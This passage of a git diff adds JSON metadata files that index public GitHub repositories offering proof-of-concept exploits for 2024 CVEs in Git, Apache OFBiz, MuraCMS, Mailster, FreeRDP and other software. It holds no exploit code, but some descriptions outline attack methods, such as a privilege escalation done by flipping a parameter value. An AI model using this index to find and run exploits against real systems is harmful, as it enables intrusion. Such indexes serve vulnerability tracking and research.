"https:\/\/github.com\/tiyeume25112004\/CVE-2024-32002", + "description": "Just small script to exploit CVE-2024-32002", + "fork": false, + "created_at": "2024-07-30T23:20:51Z", + "updated_at": "2024-07-30T23:26:17Z", + "pushed_at": "2024-07-30T23:26:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 837343866, + "name": "running-CVE-2024-32002-locally-for-tesing", + "full_name": "chrisWalker11\/running-CVE-2024-32002-locally-for-tesing", + "owner": { + "login": "chrisWalker11", + "id": 51098965, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51098965?v=4", + "html_url": "https:\/\/github.com\/chrisWalker11", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/chrisWalker11\/running-CVE-2024-32002-locally-for-tesing", + "description": "adapting CVE-2024-32002 for running offline and locally", + "fork": false, + "created_at": "2024-08-02T18:44:00Z", + "updated_at": "2024-08-04T17:39:52Z", + "pushed_at": "2024-08-04T17:38:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 843863510, + "name": "CVE-2024-32002", + "full_name": "sanan2004\/CVE-2024-32002", + "owner": { + "login": "sanan2004", + "id": 118365296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/118365296?v=4", + "html_url": "https:\/\/github.com\/sanan2004", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sanan2004\/CVE-2024-32002", + "description": "POC", + "fork": false, + "created_at": "2024-08-17T16:43:26Z", + "updated_at": "2024-08-21T10:04:48Z", + "pushed_at": "2024-08-17T16:46:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 863849686, + "name": "hook", + "full_name": "Masamuneee\/hook", + "owner": { + "login": "Masamuneee", + "id": 125840508, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/125840508?v=4", + "html_url": "https:\/\/github.com\/Masamuneee", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Masamuneee\/hook", + "description": "This is a demo for CVE-2024-32002 POC", + "fork": false, + "created_at": "2024-09-27T03:09:18Z", + "updated_at": "2024-09-27T03:34:34Z", + "pushed_at": "2024-09-27T03:34:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 863849901, + "name": "CVE-2024-32002-POC", + "full_name": "Masamuneee\/CVE-2024-32002-POC", + "owner": { + "login": "Masamuneee", + "id": 125840508, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/125840508?v=4", + "html_url": "https:\/\/github.com\/Masamuneee", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Masamuneee\/CVE-2024-32002-POC", + "description": "This is a demo for CVE-2024-32002 POC", + "fork": false, + "created_at": "2024-09-27T03:10:04Z", + "updated_at": "2024-09-27T07:08:17Z", + "pushed_at": "2024-09-27T07:08:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 863854967, + "name": "CVE-2024-32002-PoC", + "full_name": "th4s1s\/CVE-2024-32002-PoC", + "owner": { + "login": "th4s1s", + "id": 102442488, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102442488?v=4", + "html_url": "https:\/\/github.com\/th4s1s", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/th4s1s\/CVE-2024-32002-PoC", + "description": "Proof of Concept for CVE-2024-32002", + "fork": false, + "created_at": "2024-09-27T03:29:15Z", + "updated_at": "2024-09-27T03:30:38Z", + "pushed_at": "2024-09-27T03:30:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 869470523, + "name": "hook_CVE-2024-32002", + "full_name": "Julian-gmz\/hook_CVE-2024-32002", + "owner": { + "login": "Julian-gmz", + "id": 77108278, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77108278?v=4", + "html_url": "https:\/\/github.com\/Julian-gmz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Julian-gmz\/hook_CVE-2024-32002", + "description": "hihihihaa", + "fork": false, + "created_at": "2024-10-08T10:57:17Z", + "updated_at": "2024-11-21T12:20:22Z", + "pushed_at": "2024-11-21T12:20:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 876714741, + "name": "CVE-2024-32002", + "full_name": "grecosamuel\/CVE-2024-32002", + "owner": { + "login": "grecosamuel", + "id": 97310811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97310811?v=4", + "html_url": "https:\/\/github.com\/grecosamuel", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/grecosamuel\/CVE-2024-32002", + "description": null, + "fork": false, + "created_at": "2024-10-22T12:44:44Z", + "updated_at": "2024-11-24T17:15:20Z", + "pushed_at": "2024-11-25T10:35:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 892923707, + "name": "cve-2024-32002-poc", + "full_name": "XiaomingX\/cve-2024-32002-poc", + "owner": { + "login": "XiaomingX", + "id": 5387930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5387930?v=4", + "html_url": "https:\/\/github.com\/XiaomingX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/XiaomingX\/cve-2024-32002-poc", + "description": "CVE-2024-32002 是 Git 中的一个严重漏洞,允许攻击者在用户执行 git clone 操作时远程执行任意代码(RCE)。", + "fork": false, + "created_at": "2024-11-23T04:06:33Z", + "updated_at": "2024-11-24T05:53:24Z", + "pushed_at": "2024-11-23T04:07:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-32004.json b/2024/CVE-2024-32004.json new file mode 100644 index 0000000000..ece0784ad5 --- /dev/null +++ b/2024/CVE-2024-32004.json @@ -0,0 +1,64 @@ +[ + { + "id": 802872644, + "name": "CVE-2024-32004", + "full_name": "Wadewfsssss\/CVE-2024-32004", + "owner": { + "login": "Wadewfsssss", + "id": 48876891, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48876891?v=4", + "html_url": "https:\/\/github.com\/Wadewfsssss", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Wadewfsssss\/CVE-2024-32004", + "description": null, + "fork": false, + "created_at": "2024-05-19T13:57:46Z", + "updated_at": "2024-05-20T06:16:40Z", + "pushed_at": "2024-05-20T06:16:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 803351666, + "name": "CVE-2024-32004-POC", + "full_name": "10cks\/CVE-2024-32004-POC", + "owner": { + "login": "10cks", + "id": 47177550, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47177550?v=4", + "html_url": "https:\/\/github.com\/10cks", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/10cks\/CVE-2024-32004-POC", + "description": null, + "fork": false, + "created_at": "2024-05-20T14:59:16Z", + "updated_at": "2024-05-20T15:02:51Z", + "pushed_at": "2024-05-20T15:02:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-32030.json b/2024/CVE-2024-32030.json new file mode 100644 index 0000000000..97facc990a --- /dev/null +++ b/2024/CVE-2024-32030.json @@ -0,0 +1,33 @@ +[ + { + "id": 819385498, + "name": "CVE-2024-32030-Nuclei-Template", + "full_name": "huseyinstif\/CVE-2024-32030-Nuclei-Template", + "owner": { + "login": "huseyinstif", + "id": 54823077, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54823077?v=4", + "html_url": "https:\/\/github.com\/huseyinstif", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/huseyinstif\/CVE-2024-32030-Nuclei-Template", + "description": null, + "fork": false, + "created_at": "2024-06-24T11:57:26Z", + "updated_at": "2024-06-24T11:57:31Z", + "pushed_at": "2024-06-24T11:57:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-32104.json b/2024/CVE-2024-32104.json new file mode 100644 index 0000000000..c954d84830 --- /dev/null +++ b/2024/CVE-2024-32104.json @@ -0,0 +1,33 @@ +[ + { + "id": 836230704, + "name": "CVE-2024-32104", + "full_name": "Cerberus-HiproPlus\/CVE-2024-32104", + "owner": { + "login": "Cerberus-HiproPlus", + "id": 176384180, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/176384180?v=4", + "html_url": "https:\/\/github.com\/Cerberus-HiproPlus", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cerberus-HiproPlus\/CVE-2024-32104", + "description": null, + "fork": false, + "created_at": "2024-07-31T12:20:07Z", + "updated_at": "2024-08-01T07:08:09Z", + "pushed_at": "2024-08-01T07:08:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-32113.json b/2024/CVE-2024-32113.json new file mode 100644 index 0000000000..61bd365460 --- /dev/null +++ b/2024/CVE-2024-32113.json @@ -0,0 +1,105 @@ +[ + { + "id": 784744024, + "name": "CVE-2024-32113-POC", + "full_name": "RacerZ-fighting\/CVE-2024-32113-POC", + "owner": { + "login": "RacerZ-fighting", + "id": 78632303, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78632303?v=4", + "html_url": "https:\/\/github.com\/RacerZ-fighting", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RacerZ-fighting\/CVE-2024-32113-POC", + "description": "Apache OfBiz vulns", + "fork": false, + "created_at": "2024-04-10T13:22:11Z", + "updated_at": "2024-09-02T07:20:37Z", + "pushed_at": "2024-08-05T06:40:47Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 809872637, + "name": "CVE-2024-32113", + "full_name": "Mr-xn\/CVE-2024-32113", + "owner": { + "login": "Mr-xn", + "id": 18260135, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18260135?v=4", + "html_url": "https:\/\/github.com\/Mr-xn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mr-xn\/CVE-2024-32113", + "description": "Apache OFBIZ Path traversal leading to RCE POC[CVE-2024-32113 & CVE-2024-36104]", + "fork": false, + "created_at": "2024-06-03T15:57:59Z", + "updated_at": "2024-11-21T05:20:25Z", + "pushed_at": "2024-06-03T16:13:49Z", + "stargazers_count": 24, + "watchers_count": 24, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "apache", + "cve", + "cve-2024", + "cve-2024-32113", + "cve-2024-36104", + "ofbiz", + "poc", + "rce", + "rce-exploit" + ], + "visibility": "public", + "forks": 8, + "watchers": 24, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 839216934, + "name": "CVE-2024-32113", + "full_name": "YongYe-Security\/CVE-2024-32113", + "owner": { + "login": "YongYe-Security", + "id": 90460865, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90460865?v=4", + "html_url": "https:\/\/github.com\/YongYe-Security", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/YongYe-Security\/CVE-2024-32113", + "description": "CVE-2024-32113 Apache OFBIZ Batch Scanning", + "fork": false, + "created_at": "2024-08-07T07:12:56Z", + "updated_at": "2024-11-20T16:31:00Z", + "pushed_at": "2024-08-07T07:16:26Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-32136.json b/2024/CVE-2024-32136.json new file mode 100644 index 0000000000..f411425a49 --- /dev/null +++ b/2024/CVE-2024-32136.json @@ -0,0 +1,33 @@ +[ + { + "id": 796233073, + "name": "CVE-2024-32136", + "full_name": "xbz0n\/CVE-2024-32136", + "owner": { + "login": "xbz0n", + "id": 40547674, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40547674?v=4", + "html_url": "https:\/\/github.com\/xbz0n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xbz0n\/CVE-2024-32136", + "description": null, + "fork": false, + "created_at": "2024-05-05T10:49:08Z", + "updated_at": "2024-07-21T12:00:00Z", + "pushed_at": "2024-05-05T11:00:30Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-3217.json b/2024/CVE-2024-3217.json new file mode 100644 index 0000000000..81f4c59671 --- /dev/null +++ b/2024/CVE-2024-3217.json @@ -0,0 +1,33 @@ +[ + { + "id": 787948963, + "name": "CVE-2024-3217-POC", + "full_name": "BassamAssiri\/CVE-2024-3217-POC", + "owner": { + "login": "BassamAssiri", + "id": 59013588, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59013588?v=4", + "html_url": "https:\/\/github.com\/BassamAssiri", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BassamAssiri\/CVE-2024-3217-POC", + "description": null, + "fork": false, + "created_at": "2024-04-17T13:43:57Z", + "updated_at": "2024-05-08T22:44:10Z", + "pushed_at": "2024-04-17T14:15:05Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-32205.json b/2024/CVE-2024-32205.json new file mode 100644 index 0000000000..68dc9909cc --- /dev/null +++ b/2024/CVE-2024-32205.json @@ -0,0 +1,33 @@ +[ + { + "id": 789261382, + "name": "CVE-2024-32205", + "full_name": "Lucky-lm\/CVE-2024-32205", + "owner": { + "login": "Lucky-lm", + "id": 104305063, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104305063?v=4", + "html_url": "https:\/\/github.com\/Lucky-lm", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Lucky-lm\/CVE-2024-32205", + "description": null, + "fork": false, + "created_at": "2024-04-20T04:11:19Z", + "updated_at": "2024-04-20T04:11:19Z", + "pushed_at": "2024-04-20T04:11:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-32238.json b/2024/CVE-2024-32238.json new file mode 100644 index 0000000000..04768b95b9 --- /dev/null +++ b/2024/CVE-2024-32238.json @@ -0,0 +1,64 @@ +[ + { + "id": 789258062, + "name": "CVE-2024-32238", + "full_name": "asdfjkl11\/CVE-2024-32238", + "owner": { + "login": "asdfjkl11", + "id": 96732416, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96732416?v=4", + "html_url": "https:\/\/github.com\/asdfjkl11", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/asdfjkl11\/CVE-2024-32238", + "description": null, + "fork": false, + "created_at": "2024-04-20T03:55:21Z", + "updated_at": "2024-04-20T03:55:22Z", + "pushed_at": "2024-04-20T03:55:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 789466929, + "name": "CVE-2024-32238", + "full_name": "FuBoLuSec\/CVE-2024-32238", + "owner": { + "login": "FuBoLuSec", + "id": 156916644, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/156916644?v=4", + "html_url": "https:\/\/github.com\/FuBoLuSec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/FuBoLuSec\/CVE-2024-32238", + "description": "H3C ER8300G2-X config download", + "fork": false, + "created_at": "2024-04-20T16:23:10Z", + "updated_at": "2024-04-20T16:28:56Z", + "pushed_at": "2024-04-20T16:28:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-32258.json b/2024/CVE-2024-32258.json new file mode 100644 index 0000000000..8ceaaf0828 --- /dev/null +++ b/2024/CVE-2024-32258.json @@ -0,0 +1,33 @@ +[ + { + "id": 788568781, + "name": "CVE-2024-32258", + "full_name": "liyansong2018\/CVE-2024-32258", + "owner": { + "login": "liyansong2018", + "id": 25031216, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25031216?v=4", + "html_url": "https:\/\/github.com\/liyansong2018", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/liyansong2018\/CVE-2024-32258", + "description": null, + "fork": false, + "created_at": "2024-04-18T17:07:07Z", + "updated_at": "2024-11-01T15:36:18Z", + "pushed_at": "2024-11-01T15:36:15Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-32369.json b/2024/CVE-2024-32369.json new file mode 100644 index 0000000000..57daf1b7f5 --- /dev/null +++ b/2024/CVE-2024-32369.json @@ -0,0 +1,33 @@ +[ + { + "id": 796814769, + "name": "CVE-2024-32369", + "full_name": "chucrutis\/CVE-2024-32369", + "owner": { + "login": "chucrutis", + "id": 17951072, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17951072?v=4", + "html_url": "https:\/\/github.com\/chucrutis", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/chucrutis\/CVE-2024-32369", + "description": "Description: SQL Injection vulnerability in HSC Cybersecurity HSC Mailinspector v.5.2.17-3 allows a remote attacker to obtain sensitive information via a crafted payload to the start and limit parameter in the mliWhiteList.php component.", + "fork": false, + "created_at": "2024-05-06T17:22:15Z", + "updated_at": "2024-06-06T17:25:35Z", + "pushed_at": "2024-05-06T17:22:18Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-32370.json b/2024/CVE-2024-32370.json new file mode 100644 index 0000000000..2f51953664 --- /dev/null +++ b/2024/CVE-2024-32370.json @@ -0,0 +1,33 @@ +[ + { + "id": 796817594, + "name": "CVE-2024-32370", + "full_name": "chucrutis\/CVE-2024-32370", + "owner": { + "login": "chucrutis", + "id": 17951072, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17951072?v=4", + "html_url": "https:\/\/github.com\/chucrutis", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/chucrutis\/CVE-2024-32370", + "description": "An issue in HSC Cybersecurity HSC Mailinspector version 5.2.17-3 has been identified, allowing a remote attacker to obtain sensitive information via a crafted payload to the id parameter in the mliSystemUsers.php component.", + "fork": false, + "created_at": "2024-05-06T17:28:57Z", + "updated_at": "2024-06-06T17:23:55Z", + "pushed_at": "2024-05-06T18:50:34Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-32371.json b/2024/CVE-2024-32371.json new file mode 100644 index 0000000000..deb3682d89 --- /dev/null +++ b/2024/CVE-2024-32371.json @@ -0,0 +1,33 @@ +[ + { + "id": 796823130, + "name": "CVE-2024-32371", + "full_name": "chucrutis\/CVE-2024-32371", + "owner": { + "login": "chucrutis", + "id": 17951072, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17951072?v=4", + "html_url": "https:\/\/github.com\/chucrutis", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/chucrutis\/CVE-2024-32371", + "description": "A vulnerability identified as CVE-2024-32371 allows an attacker to elevate privileges by changing the type parameter from 1 to 0. This vulnerability enables an attacker with a regular user account to escalate their privileges and gain administrative access to the system.", + "fork": false, + "created_at": "2024-05-06T17:41:06Z", + "updated_at": "2024-06-06T17:25:16Z", + "pushed_at": "2024-05-06T18:21:24Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-32399.json b/2024/CVE-2024-32399.json new file mode 100644 index 0000000000..73fbe38fd2 --- /dev/null +++ b/2024/CVE-2024-32399.json @@ -0,0 +1,33 @@ +[ + { + "id": 790269006, + "name": "CVE-2024-32399", + "full_name": "NN0b0dy\/CVE-2024-32399", + "owner": { + "login": "NN0b0dy", + "id": 166635896, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/166635896?v=4", + "html_url": "https:\/\/github.com\/NN0b0dy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/NN0b0dy\/CVE-2024-32399", + "description": null, + "fork": false, + "created_at": "2024-04-22T15:15:37Z", + "updated_at": "2024-04-22T15:16:26Z", + "pushed_at": "2024-04-22T15:16:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-32459.json b/2024/CVE-2024-32459.json new file mode 100644 index 0000000000..0e07c5414b --- /dev/null +++ b/2024/CVE-2024-32459.json @@ -0,0 +1,33 @@ +[ + { + "id": 804159088, + "name": "FreeRDP-Out-of-Bounds-Read-CVE-2024-32459-", + "full_name": "absholi7ly\/FreeRDP-Out-of-Bounds-Read-CVE-2024-32459-", + "owner": { + "login": "absholi7ly", + "id": 72062217, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72062217?v=4", + "html_url": "https:\/\/github.com\/absholi7ly", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/absholi7ly\/FreeRDP-Out-of-Bounds-Read-CVE-2024-32459-", + "description": "The FreeRDP - Out-of-Bounds Read (CVE-2024-32459) vulnerability concerns FreeRDP, a free implementation of Remote Desktop Protocol. FreeRDP-based clients and servers using a version of FreeRDP prior to version 3.5.0 or 2.11.6 are vulnerable to out-of-bounds reading12. Versions 3.5.0 and 2.11.6 correct the problem", + "fork": false, + "created_at": "2024-05-22T04:19:27Z", + "updated_at": "2024-06-01T00:12:41Z", + "pushed_at": "2024-05-22T04:30:21Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-32523.json b/2024/CVE-2024-32523.json new file mode 100644 index 0000000000..cfd96f4daa --- /dev/null +++ b/2024/CVE-2024-32523.json @@ -0,0 +1,33 @@ +[ + { + "id": 799304116, + "name": "CVE-2024-32523-Poc", + "full_name": "truonghuuphuc\/CVE-2024-32523-Poc", + "owner": { + "login": "truonghuuphuc", + "id": 20487674, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20487674?v=4", + "html_url": "https:\/\/github.com\/truonghuuphuc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/truonghuuphuc\/CVE-2024-32523-Poc", + "description": "CVE-2024-32523 Mailster <= 4.0.6 - Unauthenticated Local File Inclusion", + "fork": false, + "created_at": "2024-05-11T18:16:31Z", + "updated_at": "2024-06-26T12:03:42Z", + "pushed_at": "2024-05-11T18:59:22Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-32640.json b/2024/CVE-2024-32640.json new file mode 100644 index 0000000000..5b6111d4cb --- /dev/null +++ b/2024/CVE-2024-32640.json @@ -0,0 +1,138 @@ +[ + { + "id": 801300321, + "name": "CVE-2024-32640-SQLI-MuraCMS", + "full_name": "Stuub\/CVE-2024-32640-SQLI-MuraCMS", + "owner": { + "login": "Stuub", + "id": 60468836, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60468836?v=4", + "html_url": "https:\/\/github.com\/Stuub", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Stuub\/CVE-2024-32640-SQLI-MuraCMS", + "description": "CVE-2024-32640 | Automated SQLi Exploitation PoC", + "fork": false, + "created_at": "2024-05-16T01:02:32Z", + "updated_at": "2024-11-20T16:30:46Z", + "pushed_at": "2024-05-16T21:07:32Z", + "stargazers_count": 60, + "watchers_count": 60, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0day", + "cve", + "cve-2024", + "cve-2024-32640", + "cve-2024-32640-poc", + "exploit", + "masacms", + "muracms", + "poc", + "rce", + "sqli" + ], + "visibility": "public", + "forks": 9, + "watchers": 60, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 802083233, + "name": "CVE-2024-32640-SQLI-MuraCMS", + "full_name": "0xYumeko\/CVE-2024-32640-SQLI-MuraCMS", + "owner": { + "login": "0xYumeko", + "id": 154844497, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/154844497?v=4", + "html_url": "https:\/\/github.com\/0xYumeko", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xYumeko\/CVE-2024-32640-SQLI-MuraCMS", + "description": null, + "fork": false, + "created_at": "2024-05-17T13:43:59Z", + "updated_at": "2024-06-01T18:21:22Z", + "pushed_at": "2024-05-17T13:54:29Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 